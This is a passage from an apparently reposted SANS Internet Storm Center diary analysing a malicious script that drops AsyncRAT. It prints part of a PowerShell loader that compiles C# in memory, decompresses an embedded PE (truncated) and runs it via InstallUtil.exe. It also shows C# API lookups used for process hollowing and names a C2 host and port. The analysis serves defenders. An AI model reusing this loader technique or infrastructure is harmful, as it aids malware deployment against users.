    $CompilerParametres.ReferencedAssemblies.Add(("mscorlib.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("Microsoft.VisualBasic.dll"))
    $CompilerParametres.IncludeDebugInformation = $false
    $CompilerParametres.GenerateExecutable = $false
    $CompilerParametres.GenerateInMemory = $true
    $CompilerParametres.CompilerOptions += ("/platform:X86 /unsafe /target:library")

    $BB = Decompress($BB)

    [System.CodeDom.Compiler.CompilerResults] $CompilerResults = 
       $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, 
       [System.Text.Encoding]::Default.GetString($BB))

    [Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)

    [Byte[]] $Bytes =  Decompress(@( 
      31,139,8,0,0,0,0,0,4,0,180,189,7,124,92,213,149,63,126,231,77,213,168,206,168,203,18,150,139,204,216, 
      198,178,138,37,75,6,131,213,45,219,178,213,108,75,14,193,140,164,145,52,246,72,79,158,25,201,150,13, 
      142,197,2,129,36,180,116,88,146,80,194,166,146,132,36,155,182,41,56,
      (bytes removed)
      61,237,1,92,113,253,243,0,180,0,0))

    try {
        [String] $MyPt = 
        [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),
         "InstallUtil.exe")
        [Object[]] [email protected]($MyPt.Replace("Framework64","Framework") ,$Bytes)
        return $T.GetMethod($MT).Invoke($null, $Params)
    } catch { }
}

The CSharp code is located in the variable BB (I posted the code on Pastebin[3]). By having a look at the code, we can see a bunch of interesting API calls:

private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi(ReverseString(Kernel32), ReverseString(VirtualAllcEx)); 
private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi(ReverseString(Kernel32), ReverseString(WriteProcessMem)); 
private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi(ReverseString(Kernel32), ReverseString(ReadProcessMem)); 
private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec)); 
private static readonly DelegateCreateProcessA CreateProcessA = LoadApi(ReverseString(Kernel32), ReverseString(CreateProcA));

This clearly indicates that process hollowing is used to replace the code of a legit process with malicious code. This code is located in the variable Bytes and is a PE file (SHA256:D452CEE94E3A2D58B05E9F62A4AA4004C0632D9B56FA8B57664D295BC88C4DF0) that tries to communicate with a C2 server located at asin8989.ddns.net on port 8989. The malware belongs to the AsyncRat[4] family. 

Note: My advice to protect yourself against such malicious .vbs file is to replace the default app to open them with notepad.exe. 

[1] https://www.virustotal.com/gui/file/8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead/detection
[2] https://github.com/sandboxie-plus/sandboxie
[3] https://pastebin.com/cW25WEpY
[4] https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →
Page 5 of 6 «...23456